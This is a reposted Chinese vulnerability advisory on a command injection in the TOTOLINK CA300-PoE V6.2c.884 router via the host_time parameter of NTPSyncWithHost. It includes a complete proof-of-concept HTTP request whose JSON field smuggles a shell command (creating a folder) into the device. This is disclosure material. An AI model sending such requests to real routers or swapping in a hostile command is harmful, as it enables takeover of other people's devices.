TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

admin 2023年2月5日15:59:12评论22 views字数 824阅读2分44秒阅读模式

描述

TOTOLINK路由器CA300-PoE V6.2c.884被发现存在命令注入漏洞NTPSyncWithHost。

固件信息

厂商地址:https ://www.totolink.net/固件下载地址:https ://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html受影响的版本版本:V6.2c.884

TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

漏洞详情

概念验证:

POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 192.168.0.254User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 100Origin: http://192.168.0.254Connection: keep-aliveReferer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260Cookie: SESSION_ID=2:1673492439:2
{"topicurl":"NTPSyncWithHost", "host_time":"2022-01-01 20:12:43';mkdir /test9999;'"}

TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

文件夹创建成功

TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

原文始发于微信公众号(Ots安全):TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月5日15:59:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞 http://cn-sec.com/archives/1537705.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: